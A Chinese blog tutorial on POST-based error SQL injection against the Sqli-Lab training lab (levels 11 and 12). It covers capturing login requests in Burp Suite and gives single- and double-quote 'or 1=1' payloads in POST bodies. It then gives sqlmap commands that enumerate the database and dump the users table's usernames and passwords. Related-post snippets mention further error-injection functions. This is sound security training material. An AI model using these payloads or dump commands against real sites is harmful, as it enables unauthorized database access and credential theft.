MySQL|POST基于错误的注入

最新推荐文章于 2024-07-12 07:13:33 发布
最新推荐文章于 2024-07-12 07:13:33 发布
阅读量1.5k 收藏 2
点赞数 2
分类专栏: 渗透测试学习 信息安全 Web安全 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121350616
版权

MySQL|POST基于错误的注入

1.Burpsuit抓取HTTP请求

Burpsuit是一款Web安全测试的利器,集成了几乎web安全测试中所有需要用到的功能。
运行前提:
1.需要安装Java
下载连接:https://www.java.com/zh_CN/
在这里插入图片描述
同意并且免费下载
在这里插入图片描述
下载好之后直接运行,一路下一步即可。
安装好之后打开DOS界面,查看是否安装成功
按住Win + r键,运行框里输入cmd命令,确定

在这里插入图片描述
输入

java

在这里插入图片描述
出现上图的情况说明java环境配置成功。

2.截断代理设置:在浏览器中设置局域网代理。
这里就以火狐浏览器举例说明
打开设置
在这里插入图片描述
常规滑到最下面,找到设置
在这里插入图片描述
设置如下图所示的参数
在这里插入图片描述
3.启动Burpsuite进行截断抓取HTTP消息
使用Burpsuit之前,查看是否Proxy Listeners是否为running状态
在这里插入图片描述

2.POST基于错误单引号注入

注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。当然可以借助对应的插件可以完成修改任务。
以Sqli-Lab Less11为例
在这里插入图片描述
输入用户名和密码,进行抓包
用户名:admin
密 码:123456
在这里插入图片描述
抓包可以看到,此处的用户名和密码使用的是POST的传参方式,将数据发送至Repeater
在这里插入图片描述
点击Repeater,点击go发送包
在这里插入图片描述

在这里插入图片描述
当我使用反斜杠,在用户名或密码后面均会报错

uname=admin\&passwd=12345&submit=Submit

在这里插入图片描述

uname=admin&passwd=12345\&submit=Submit

在这里插入图片描述
使用单引号进行测试

uname=admin&passwd=12345' or 1=1 --+&submit=Submit

在这里插入图片描述
可以预测源代码中的查询语句是

select uname,passwd from 表名 where uname='xxx' and passwd='xxx' limit 0,1

源代码如下所示
在这里插入图片描述

2.POST基于错误双引号注入

以Sqli-Lab Less12为例
还是和11关一样,抓包的细节,这里就不在赘述
在这里插入图片描述
查看报错信息

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"12345\") LIMIT 0,1' at line 1

可以推测查询语句为

select uname,passwd from 表名 where uname=("xxxx") and passwd=("xxxx") limit 0,1

进行测试

uname=admin&passwd=12345") or 1=1--+&submit=Submit

在这里插入图片描述

3.Sqlmap安全测试

sqlmap安全测试进行post注入
复制Burpsuite截断的HTTP请求数据包文本文件中
语法如下:
Sqlmap -r 文件绝对路径 -p 指定探测参数
(1)抓取数据包
在这里插入图片描述
(2)在sqlmap的文件夹下,新建文本文档,建议使用数字或字母命名

在这里插入图片描述
指定了对应的参数与技术

python2 sqlmap.py -r 1.txt -p passwd --technique E

在这里插入图片描述
在这里插入图片描述
查看当前使用的数据库名称

python2 sqlmap.py -r 1.txt -p passwd --technique E --current-db

在这里插入图片描述
爆破表名

python2 sqlmap.py -r 1.txt -p passwd --technique E -D security --tables

在这里插入图片描述
使用users库,爆破字段名

python2 sqlmap.py -r 1.txt -p passwd --technique E -D security -T users --columns

在这里插入图片描述
爆破字段的内容

python2 sqlmap.py -r 1.txt -p passwd --technique E -D security -T users -C "password,username" --dump

在这里插入图片描述
至此,探测完毕

山川绿水
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL报错注入
qq_64332865的博客
02-18 587
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
MYSQL报错注入
聚鼎安全
01-08 3277
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
POST注入与报错注入(封神台靶场绕过getshell题目)
qq_66013948的博客
09-19 124
接下来,我们就可以开始进行注入了,先将user的值进行闭合,也就是'--(空格),之后,再发送一次,会出现密码错误(用户为admin时)或者不存在该管理用户(用户名为错误的时候),之后,我们可以在' 后面,--前面构造order by来判断字段数,当字段数为6的时候,出现了数据库操作失败,那么可以知道的是,这里边有5个字段。二.对于封神台第一题,我们就是在url上面动的手脚,这个可以叫做手动注入,也可以叫做GET注入,那么,除了GET注入之外,我们可以试着利用一下POST注入。查看一下报错的是不是。
sql 注入的类型之 post 基于错误注入sqllib靶场less-11-12)(通过burpusite分析)
weixin_74182283的博客
03-30 1237
post注入和get注入一样,都是基于数据库没有对语句进行足够多的过滤,导致用户可以直接在url上执行sql语句。这两基本上没区别,但是基于post注入在真实情况下会比get的多得多,最典型的post注入就是万能密码。
最全MySQLPostgreSQL 实时数据同步实操分享,4个改变你编程技能的小技巧
2301_78399550的博客
05-13 903
针对最近很多人都在面试,我这边也整理了相当多的面试专题资料,也有其他大厂的面经。希望可以帮助到大家。下面的面试题答案都整理成文档笔记。也还整理了一些面试资料&最新2021收集的一些大厂的面试真题(都整理成文档,小部分截图)最新整理电子书本文已被CODING开源项目:【一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码】收录需要这份系统化的资料的朋友,可以点击这里获取。
1-7 POST基于错误注入
LoveStarbucks的博客
12-29 360
1-7 POST基于错误注入 1.Burpsuite抓取HTTP请求 (1)截断代理设置:在浏览器中设置局域网中代理。 安装该插件,或者可以直接设置代理 127.0.0.1 8080 (2)启动Burpsuite截取信息 首先看Burpsuite是否处于Run状态,如果不处于,则可能是端口冲突,需要修改端口,同时在浏览器中设置的代理也需要修改端口。 1)开启截断 2).捕获到截取的信息 ...
post注入、报错注入学习笔记
XiaoXiao_RenHe的专栏
04-24 2848
post注入、报错注入学习笔记
mysql报错注入_Mysql报错注入详解
weixin_34138102的博客
12-23 239
Mysql报错注入1、前言有的时候我们发现一个注入页面,该页面的数据不是由我们所控制的变量获取的,不能通过常规的union查询获取到结果,此时幸运的是我们在输入一个单引号的时候发现页面打印了一些报错的信息,但是如何利用,我们下面来详细说明一下。2、环境(Windows2003+wamp)配置好php的环境,准备一个注入页面,在渗透系统的8080端口处,注入点:http://192.168.4.12...
第八节 Mysql POST基于错误注入-01
09-15
Mysql POST基于错误注入 本节课程主要讲解了Mysql POST基于错误注入的攻击技术,包括使用Burpsuite抓取HTTP请求、POST基于错误单引号注入和双引号注入Sqlmap安全测试等。 在Web应用安全测试中,Burpsuite是一款...
ssh.rar_SSH登录_ssh_ssh mysql_基于SSH
09-14
标题中的"ssh.rar_SSH登录_ssh_ssh mysql_基于SSH"表明这个压缩包可能包含了关于如何使用SSH框架实现一个基于MySQL数据库的登录功能的资源。SSH框架通常包括以下组件: 1. **Spring**:这是一个全面的应用框架,...
基于PHP+MySQL实现用户注册登录功能1
08-08
如果连接失败,程序将捕获PDOException并显示错误信息。 ```php $dbms = 'mysql'; $host = 'localhost:3307'; $dbName = 'phpDemo'; $user = 'root'; $pass = ''; $dsn = "$dbms:host=$host;dbname=$dbName...
基于ssm+mysql的书籍借阅系统源码数据库.zip
09-01
【标题】中的“基于ssm+mysql的书籍借阅系统源码数据库”表明这是一个使用了SSM(Spring、SpringMVC、MyBatis)框架和MySQL数据库开发的图书借阅管理系统。SSM是Java Web开发中常用的一个轻量级框架组合,而MySQL是...
Xpath:一个基于python的跨平台工具,可自动检测和利用基于错误注入安全漏洞的过程
05-06
Xpath 一个基于python的跨... git clone https://github.com/r0oth3x49/Xpath.git特征支持基于错误MySQL / PostgreSQL / MSSQL注入。 支持列出的dbms的所有类型(HEADERS / COOKIE / POST / GET)。 添加了支持代理选
【Less-13】POST注入之报错注入
ssrf
11-02 235
文章目录一、测试注入点二、报错注入 一、测试注入点 这关只有输入为真回显字母为蓝色,假为红色,也会报错,所以可以用报错和盲注。这里是用')来闭合 uname=admin') or '1'='1'#&passwd=admin&submit=Submit 这里使用报错注入,具体步骤查看: https://blog.csdn.net/weixin_44032232/article/details/109314974 二、报错注入 uname=admin') and updatexml(1,
sqli-labs第十七关(post-报错注入
qq_42266432的博客
08-29 860
进入到十七关后发现这关有点不同,上面多了一行提示:密码重新设置,咱也不懂啥意思,在试了写常规注入的方法后,没有发现什么可以利用的点,于是决定去看看代码,虽然我不会php 先看这一部分有sql语句的: 从users表中搜索出uname和psw,条件和psw无关,只看uname mysql_fetch_array()好像能返回键值对,而且除了将数据以数字索引方式储存在数组中之外,还可以将数据作为关联索引储存,用字段名作为键名。 uname正确的话,再将users表中psw更新,条件等于刚刚输入的unam.
SQL注入之基于报错的注入
weixin_68951704的博客
07-05 862
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
MYSQL POST注入详解
AaronLuo
09-01 3397
POST注入产生的原因 在登录处,用于判断用户名、密码会使用select语句 在修改密码出,更新密码,会使用到update语句 在商城系统中,订单的添加,删除,可能会使用到insert,delete语句 HTTP之POST请求 HTTP报文分为三部分,分别为请求行,请求头,请求体 请求行:由请求方法字段、URL字段和HTTP协议版本字段3个字段组成 请求头:由关键字/值对组成,每行一对,关...
mysqlpost请求
ycw343465134的专栏
09-04 1841
mysql的php #define kWangyiHeadNewsAPI @"http://localhost:8888/job/jobs.php"
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
最新发布
技术笔记
07-12 743
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
写一个javaweb实现登录注册基于(spring mvc,mysql,maven)的代码
06-06
在上面的代码中,我们使用了注解@Repository将UserDaoImpl类标记为Spring管理的Bean,并使用注解@Autowired将SessionFactory注入到UserDaoImpl中。在addUser方法中,我们使用Hibernate的API将User对象存储到数据库中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值